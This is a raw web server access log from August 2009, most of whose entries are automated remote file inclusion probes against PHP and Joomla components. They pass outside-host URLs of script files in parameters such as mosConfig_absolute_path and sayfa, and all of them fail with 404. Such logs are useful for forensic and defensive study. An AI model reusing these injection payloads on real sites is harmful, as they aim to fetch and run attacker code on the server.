62.128.135.52 - - [02/Aug/2009:05:03:00 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
216.120.237.150 - - [02/Aug/2009:05:03:06 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
110.45.145.66 - - [02/Aug/2009:05:03:17 -0400] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:03:17 -0400] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:03:17 -0400] "GET /logs/access_log.Q109060300/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:03:17 -0400] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:03:17 -0400] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:03:17 -0400] "GET /logs/access_log.Q109060300/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:03:17 -0400] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:03:17 -0400] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:03:17 -0400] "GET /logs/access_log.Q109060300/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:03:20 -0400] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:03:20 -0400] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:03:20 -0400] "GET /logs/access_log.Q109060300/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.128.135.52 - - [02/Aug/2009:05:03:32 -0400] "GET /logs/error_log.Q109071200//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
110.45.145.66 - - [02/Aug/2009:05:03:34 -0400] "GET /logs/access_log.Q109060300%20%20/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:03:35 -0400] "GET /logs/access_log.Q109060300%20%20/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.111.62.19 - - [02/Aug/2009:05:03:37 -0400] "GET /logs/access_log.Q109071100//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
110.45.145.66 - - [02/Aug/2009:05:03:37 -0400] "GET /logs/access_log.Q109060300%20%20/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:03:37 -0400] "GET /logs/access_log.Q109060300%20%20/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:03:44 -0400] "GET /logs/access_log.Q109051500%20%20/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:03:45 -0400] "GET /logs/access_log.Q109051500%20%20/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:03:48 -0400] "GET /logs/access_log.Q109051500%20%20/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.111.62.19 - - [02/Aug/2009:05:03:49 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
110.45.145.66 - - [02/Aug/2009:05:03:50 -0400] "GET /logs/access_log.Q109051500%20%20/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
213.171.225.234 - - [02/Aug/2009:05:05:11 -0400] "GET /logs/error_log.Q109052400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
65.55.105.232 - - [02/Aug/2009:05:05:41 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.232 - - [02/Aug/2009:05:05:41 -0400] "GET /logs/error_log.Q108030200 HTTP/1.1" 404 223 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
110.45.145.66 - - [02/Aug/2009:05:05:48 -0400] "GET /logs/access_log.Q109051500/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:05:48 -0400] "GET /logs/access_log.Q109051500/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:05:52 -0400] "GET /logs/access_log.Q109051500/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:06:05 -0400] "GET /logs/access_log.Q109051500/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:40 -0400] "GET /logs/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:40 -0400] "GET /index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:40 -0400] "GET /logs/access_log.Q109061800/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:40 -0400] "GET /index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:40 -0400] "GET /logs/access_log.Q109061800/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:40 -0400] "GET /logs/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:40 -0400] "GET /index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:40 -0400] "GET /logs/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:40 -0400] "GET /logs/access_log.Q109061800/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:40 -0400] "GET /index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:40 -0400] "GET /logs/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:40 -0400] "GET /logs/access_log.Q109061800/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:43 -0400] "GET /index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:43 -0400] "GET /logs/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:43 -0400] "GET /logs/access_log.Q109061800/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:58 -0400] "GET /index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:58 -0400] "GET /logs/access_log.Q109061800%20%20/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:58 -0400] "GET /logs/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:58 -0400] "GET /index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:58 -0400] "GET /logs/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:58 -0400] "GET /logs/access_log.Q109061800%20%20/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:58 -0400] "GET /index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:58 -0400] "GET /logs/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:07:58 -0400] "GET /logs/access_log.Q109061800%20%20/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:08:04 -0400] "GET /index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:08:04 -0400] "GET /logs/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:08:04 -0400] "GET /logs/access_log.Q109061800%20%20/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.80.7.120 - - [02/Aug/2009:05:08:09 -0400] "GET //index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 208 "-" "-"
213.171.225.234 - - [02/Aug/2009:05:08:37 -0400] "GET /logs/access_log.Q109060400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
110.45.145.66 - - [02/Aug/2009:05:08:41 -0400] "GET /index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:08:41 -0400] "GET /logs/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:08:41 -0400] "GET /logs/access_log.Q109061800/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.80.7.120 - - [02/Aug/2009:05:08:47 -0400] "GET //index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 208 "-" "-"
110.45.145.66 - - [02/Aug/2009:05:08:57 -0400] "GET /logs/access_log.Q109061000/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
213.171.225.234 - - [02/Aug/2009:05:09:05 -0400] "GET /logs/error_log.Q109071900/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
213.171.225.234 - - [02/Aug/2009:05:09:06 -0400] "GET /logs/error_log.Q109060400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
213.171.225.234 - - [02/Aug/2009:05:09:35 -0400] "GET /logs/error_log.Q109071100/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
110.45.145.66 - - [02/Aug/2009:05:09:48 -0400] "GET /index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:09:48 -0400] "GET /logs/access_log.Q109061800/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:09:48 -0400] "GET /logs/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:05:10:11 -0400] "GET /logs/access_log.Q109062700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:05:10:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.201 - - [02/Aug/2009:05:10:45 -0400] "GET /logs/error_log.Q108111800 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
110.45.145.66 - - [02/Aug/2009:05:11:20 -0400] "GET /index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:11:20 -0400] "GET /logs/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:11:20 -0400] "GET /logs/access_log.Q109061800/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:05:11:40 -0400] "GET /logs/access_log.Q109061000/index.php?sayfa=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:05:11:44 -0400] "GET /index.php?sayfa=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:05:11:44 -0400] "GET /logs/index.php?sayfa=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:05:11:44 -0400] "GET /logs/access_log.Q109061800/index.php?sayfa=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:05:11:54 -0400] "GET /logs/index.php?sayfa=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:05:11:54 -0400] "GET /index.php?sayfa=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:05:11:54 -0400] "GET /logs/access_log.Q109061800%20%20/index.php?sayfa=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:05:11:58 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:05:12:06 -0400] "GET /logs/index.php?sayfa=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:05:12:06 -0400] "GET /index.php?sayfa=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:05:12:06 -0400] "GET /logs/access_log.Q109061800/index.php?sayfa=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:12:10 -0400] "GET /index2.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:12:10 -0400] "GET /logs/index2.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:12:10 -0400] "GET /logs/access_log.Q109051500/index2.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:12:18 -0400] "GET /index2.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:12:18 -0400] "GET /logs/index2.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:12:18 -0400] "GET /logs/access_log.Q109051500%20%20/index2.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:12:30 -0400] "GET /index2.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:12:30 -0400] "GET /logs/index2.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:12:30 -0400] "GET /logs/access_log.Q109051500/index2.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:12:38 -0400] "GET /logs/access_log.Q109062800%20%20/index2.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:12:39 -0400] "GET /logs/access_log.Q109062800/index2.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:05:12:39 -0400] "GET /logs/error_log.Q109061800/index.php?sayfa=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
74.6.149.44 - - [02/Aug/2009:05:12:59 -0400] "GET /images/items/EcOm/7470915_full.jpg HTTP/1.0" 200 11257 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)"
67.15.48.60 - - [02/Aug/2009:05:13:03 -0400] "GET /logs/access_log.Q109051400//errors.php?error=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
67.15.48.60 - - [02/Aug/2009:05:13:03 -0400] "GET /logs//errors.php?error=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.810"
67.15.48.60 - - [02/Aug/2009:05:13:04 -0400] "GET //errors.php?error=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.810"
217.199.222.19 - - [02/Aug/2009:05:13:04 -0400] "GET /logs/error_log.Q109061800%20%20/index.php?sayfa=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.15.48.60 - - [02/Aug/2009:05:13:22 -0400] "GET /logs/access_log.Q109051800//errors.php?error=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
66.232.145.150 - - [02/Aug/2009:05:13:34 -0400] "GET /logs/access_log.Q109052000///appserv/main.php?appserv_root=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
66.232.145.150 - - [02/Aug/2009:05:13:34 -0400] "GET ///appserv/main.php?appserv_root=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
66.232.145.150 - - [02/Aug/2009:05:13:34 -0400] "GET /logs///appserv/main.php?appserv_root=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
66.232.145.150 - - [02/Aug/2009:05:14:17 -0400] "GET /logs/error_log.Q109052000///appserv/main.php?appserv_root=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
66.232.145.150 - - [02/Aug/2009:05:14:18 -0400] "GET /logs/error_log.Q109052000%20///appserv/main.php?appserv_root=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
66.232.145.150 - - [02/Aug/2009:05:14:19 -0400] "GET /logs/access_log.Q109052000%20///appserv/main.php?appserv_root=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
220.181.7.130 - - [02/Aug/2009:05:14:46 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [02/Aug/2009:05:15:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.150.78.235 - - [02/Aug/2009:05:15:28 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:05:15:42 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:05:15:42 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:05:15:42 -0400] "GET /logs/access_log.Q109071300/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
213.171.225.234 - - [02/Aug/2009:05:15:48 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.171.225.234 - - [02/Aug/2009:05:15:50 -0400] "GET /logs/error_log.Q109051400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
77.221.130.3 - - [02/Aug/2009:05:15:50 -0400] "GET /logs/access_log.Q109061200/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:05:15:54 -0400] "GET /logs/access_log.Q109052600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:05:15:55 -0400] "GET /logs/access_log.Q109062400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
213.171.225.234 - - [02/Aug/2009:05:17:21 -0400] "GET /logs/error_log.Q109052900/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
123.125.66.132 - - [02/Aug/2009:05:17:21 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.242.165.138 - - [02/Aug/2009:05:17:25 -0400] "GET /index.php?sayfa=http://lec.chonbuk.ac.kr/bak/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
123.242.165.138 - - [02/Aug/2009:05:17:25 -0400] "GET /logs/access_log.Q109061800/index.php?sayfa=http://lec.chonbuk.ac.kr/bak/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
123.242.165.138 - - [02/Aug/2009:05:17:25 -0400] "GET /logs/index.php?sayfa=http://lec.chonbuk.ac.kr/bak/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
